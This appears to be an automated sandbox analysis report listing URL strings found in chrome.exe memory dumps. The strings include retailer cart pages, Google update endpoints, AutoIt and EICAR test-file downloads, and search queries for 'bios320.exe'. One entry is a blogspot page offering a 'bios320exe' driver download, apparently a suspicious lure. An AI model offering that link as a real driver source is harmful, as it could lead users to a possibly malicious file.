Source: chrome.exe, 00000008.00000002.2132840549.000009B40087B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1002628944.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136680471.000009B400F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.snapchat.com/cm/i
Source: chrome.exe, 00000008.00000002.2132840549.000009B40087B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1002628944.000009B4017BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
Source: chrome.exe, 00000008.00000002.2143295182.000009B401FD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://update.googleapis.com/service/update2/json
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://update.googleapis.com/service/update2/json?cup2key=14:v_5pxGLPvaMnDZ_4t2nAW0oEEw2zTz0k_MDyhB
Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/
Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.academy.com/shop/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.acehardware.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ae.com/us/en/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.altardstate.com/cart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anthropologie.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.apple.com/shop/bag
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.atlassian.com/purchase/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.att.com/buy/cart
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129802105.000009B4000F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/
Source: chrome.exe, 00000008.00000002.2140605622.000009B4015A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141515233.000009B401874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: chrome.exe, 00000008.00000002.2141515233.000009B401874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeime
Source: chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141082802.000009B40175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
Source: chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeer7
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/
Source: chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141082802.000009B40175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140833525.000009B4016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/v
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bathandbodyworks.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.belk.com/shopping-bag/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/cart
Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.do
Source: chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=58216995782927489&postID=5453638059923624242&blogspo
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bloomingdales.com/my-bag
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.boostmobile.com/cart.html
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.buybuybaby.com/store/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.carid.com/cart.php
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.chegg.com/shoppingcart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.containerstore.com/cart/list.htm
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.containerstore.com/cart/list.htmhttps://www.revolve.com/r/ShoppingBag.jsp
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dsw.com/en/us/shopping-bag
Source: chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org
Source: chrome.exe, 00000008.00000003.1547553627.000009B4004BB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/
Source: chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046362935.000009B4020EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140833525.000009B4016F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.electronicexpress.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.etsy.com/cart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eyebuydirect.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.fingerhut.com/cart/index
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.freepeople.com/cart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gamestop.com/cart/
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141993291.000009B401A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966714458.000009B400A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133308324.000009B400910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1547195475.000009B4010C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140458716.000009B401545000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135943366.000009B400E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1547148807.000009B400E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046362935.000009B4020EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970199396.000009B4011D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140458716.000009B401545000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141082802.000009B40175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133238628.000009B400900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046362935.000009B4020EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.967814195.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133430794.000009B400950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972505265.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0B4
Source: chrome.exe, 00000008.00000002.2139995796.000009B401468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000008.00000003.973089654.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000008.00000003.966714458.000009B400A94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966951550.000009B400395000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133430794.000009B400950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129411778.000009B40005A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.968219385.000009B400395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-32x32.png
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcn
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchc
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocnca
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdga
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabj
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgk
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkke
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api2/aframe
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401AE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000008.00000003.1547195475.000009B4010C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=adobe
Source: chrome.exe, 00000008.00000002.2135943366.000009B400E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129316003.000009B400004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=at
Source: chrome.exe, 00000008.00000003.1547148807.000009B400E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137867691.000009B40114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129316003.000009B400004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=autoit
Source: chrome.exe, 00000008.00000003.1547195475.000009B4010C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=bios320.exe
Source: chrome.exe, 00000008.00000002.2132563631.000009B4007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132803681.000009B400838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130176449.000009B400190000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=firefox
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137867691.000009B40114C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=java
Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135193392.000009B400CF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=testzentrum
Source: chrome.exe, 00000008.00000003.972963112.000009B400574000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1161401425.000009B400574000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2131740435.000009B400574000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000008.00000003.944001625.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2128965650.000009B000654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
